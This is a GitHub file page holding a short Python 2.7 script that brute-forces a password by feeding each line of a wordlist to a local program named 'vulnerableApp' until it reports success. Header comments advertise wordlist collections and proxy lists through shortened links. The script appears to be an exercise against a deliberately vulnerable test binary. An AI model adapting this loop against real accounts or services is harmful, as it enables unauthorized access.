forked from eye9poob/python
-
Notifications
You must be signed in to change notification settings - Fork 0
/
basic_password_bruteforcing_tool.py
35 lines (34 loc) · 1.42 KB
/
basic_password_bruteforcing_tool.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#!/usr/bin/python
#Python Version : 2.7
# __ _ __ _
# / /_ __ __ ______________ _____ __ __ (_)_ ______ / /__(_)__
# / __ \/ / / / / ___/ ___/ __ `/_ / / / / / / / / / / __ \/ //_/ / _ \
# / /_/ / /_/ / / /__/ / / /_/ / / /_/ /_/ / / / /_/ / / / / ,< / / __/
# /_.___/\__, / \___/_/ \__,_/ /___/\__, /_/ /\__,_/_/ /_/_/|_/_/\___/
# /____/ /____/___/
#
###############################################################################
# Download huge collections of wordlist:#
#http://ul.to/folder/j7gmyz#
##########################################################################
#
####################################################################
# Need daylie updated proxies?#
#http://j.mp/Y7ZZq9#
################################################################
#
######################################################
#### Basic Password Bruteforcing Tool ######
###################################################
#
import subprocess
import re
fo = open("password.txt", 'r');
for lines in fo:
password = lines.split('\n')
brute = subprocess.Popen(["./vulnerableApp", "-f", "foo.txt", "-p", password[0]], stdout=subprocess.PIPE)
if(re.search("Success", brute.communicate()[0])):
print "Password Cracked and your Password is ", password[0]
exit()
else:
print password[0], " is not Password"